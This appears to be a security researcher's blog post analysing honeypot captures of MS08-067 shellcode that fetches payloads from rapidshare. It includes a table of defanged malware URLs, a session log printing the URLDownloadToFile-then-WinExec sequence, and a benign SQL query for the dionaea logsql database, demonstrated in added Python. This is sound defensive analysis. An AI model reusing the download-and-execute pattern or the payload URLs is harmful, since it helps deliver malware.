There is malware that fetches its payload from rapidshare and installs it on the compromised machine.
Nothing new in itself, I have seen shellcode downloading files from rapidshare before:
| first | last | hits | url |
|---|---|---|---|
| 2010-01-06 | 2010-01-07 | 2 | hxtp://rapidshare.com/files/331049304/hitman1 |
| 2010-01-08 | 2010-01-10 | 2 | hxtp://rapidshare.com/files/332058885/two |
| 2010-01-12 | 2010-01-12 | 1 | hxtp://rapidshare.com/files/333804484/roo |
| 2010-01-17 | 2010-01-17 | 1 | hxtp://rapidshare.com/files/335701706/uhit |
| 2010-01-20 | 2010-01-20 | 1 | hxtp://rapidshare.com/files/337582552/newtom |
| 2010-01-21 | 2010-01-21 | 1 | hxtp://rapidshare.com/files/338398794/tomhas |
| 2010-01-21 | 2010-01-21 | 1 | hxtp://rapidshare.com/files/338403156/farhas |
| 2010-01-25 | 2010-01-25 | 1 | hxtp://rapidshare.com/files/340552045/tomd |
| 2010-01-27 | 2010-01-27 | 1 | hxtp://rapidshare.com/files/341701463/tsa |
| 2010-01-27 | 2010-01-27 | 1 | hxtp://rapidshare.com/files/341737994/xc |
| 2010-01-29 | 2010-01-30 | 2 | hxtp://rapidshare.com/files/342702954/dams |
What is notable is that the shellcode downloads the files directly, as in this session captured by the honeypot (MS08-067 exploit against SRVSVC, then URLDownloadToFile followed by WinExec on the fetched file):
2010-01-30 13:26:11
connection 74395 smbd tcp accept 10.161.145.92:445 <- 10.8.128.125:1062
p0f: genre:'Windows' detail:'2000 SP2+, XP SP1+ (seldom 98)' uptime:'-1' tos:'high reliability' dist:'13' nat:'0' fw:'0'
dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'},
{'return': '0', 'args': ['', 'hxtp://rapidshare.com/files/342702954/dams', '66.scr', '0', '0'],
'call': 'URLDownloadToFile'},
{'return': '32', 'args': ['66.scr', '895'], 'call': 'WinExec'},
{'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
offer: hxxp://rapidshare.com/files/342702954/dams
download: 86f51838501e41bed7e96bbbc559fccb hxtp://rapidshare.com/files/342702954/dams
Usually rapidshare makes you wait before a download starts, unless you pay for direct downloads. So my guess is that somebody paid rapidshare to serve these files as direct downloads.
If you want to query your dionaea logsql database for rapidshare downloads, here is the query (first and last seen date, number of hits, and the URL, grouped per URL):

```sql
SELECT
    date(MIN(connection_timestamp), 'unixepoch', 'localtime') AS first,
    date(MAX(connection_timestamp), 'unixepoch', 'localtime') AS last,
    COUNT(download_url) AS hits,
    download_url AS url
FROM
    downloads
    NATURAL JOIN connections
WHERE
    download_url LIKE '%rapid%'
GROUP BY
    download_url
ORDER BY MIN(connection_timestamp);
```
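To show what the query above actually does, here is an added example (not part of the original post or of dionaea itself) that rebuilds the two tables the query touches in an in-memory SQLite database, fills them with constructed rows, and runs the same query with the LIKE pattern parameterised so it can be reused for other hosters. The schema is an assumption: only the column names the query uses are recreated, the real logsql database has many more tables and columns. All connection IDs, hosts, hashes and URLs below are invented sample data.

```python
import sqlite3
from datetime import datetime, timezone

# Assumed subset of dionaea's logsql schema: just the columns the page's
# query references. NATURAL JOIN works because the only shared column
# name is "connection".
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY,
    connection_timestamp INTEGER,
    remote_host TEXT
);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY,
    connection INTEGER,
    download_url TEXT,
    download_md5_hash TEXT
);
"""

# The page's query, with the LIKE pattern turned into a bound parameter.
DOWNLOADS_BY_URL_QUERY = """
SELECT
    date(MIN(connection_timestamp), 'unixepoch', 'localtime') AS first,
    date(MAX(connection_timestamp), 'unixepoch', 'localtime') AS last,
    COUNT(download_url) AS hits,
    download_url AS url
FROM downloads
NATURAL JOIN connections
WHERE download_url LIKE ?
GROUP BY download_url
ORDER BY MIN(connection_timestamp);
"""


def epoch(s):
    """'YYYY-MM-DD HH:MM:SS' (taken as UTC) -> integer epoch, as dionaea stores it."""
    dt = datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return int(dt.timestamp())


def local_date(ts):
    """Same conversion SQLite does with 'unixepoch','localtime'; used to check results."""
    return datetime.fromtimestamp(ts).date().isoformat()


# Constructed sample rows (not real honeypot data).
CONNECTIONS = [
    (74390, epoch("2010-01-29 10:00:00"), "10.8.128.125"),
    (74393, epoch("2010-01-30 09:30:00"), "10.8.128.200"),
    (74395, epoch("2010-01-30 13:26:11"), "10.8.128.125"),
    (74396, epoch("2010-01-30 14:00:00"), "10.8.128.130"),
]
DOWNLOADS = [
    (1, 74390, "http://rapidshare.com/files/342702954/dams", "86f51838501e41bed7e96bbbc559fccb"),
    (2, 74393, "http://example.invalid/payload.exe", "d41d8cd98f00b204e9800998ecf8427e"),
    (3, 74395, "http://rapidshare.com/files/342702954/dams", "86f51838501e41bed7e96bbbc559fccb"),
    (4, 74396, "http://rapidshare.com/files/999999999/xyz", "c4ca4238a0b923820dcc509a6f75849b"),
]


def build_db():
    """Create the in-memory database and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO connections VALUES (?, ?, ?)", CONNECTIONS)
    con.executemany("INSERT INTO downloads VALUES (?, ?, ?, ?)", DOWNLOADS)
    return con


def downloads_by_url(con, pattern="%rapid%"):
    """Run the query; returns a list of (first, last, hits, url) tuples, oldest URL first."""
    return con.execute(DOWNLOADS_BY_URL_QUERY, (pattern,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    for first, last, hits, url in downloads_by_url(db):
        print(f"| {first} | {last} | {hits} | {url} |")
```

Against a real logsql file replace `build_db()` with `sqlite3.connect("/path/to/logsql.sqlite")`; the two rows for the `dams` URL collapse into one line with `hits` of 2, which is exactly how the table at the top of this post was produced.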
This is rather old behaviour; people on YASML told me it has been reported to rapidshare a couple of times, but they only act on it reactively… :/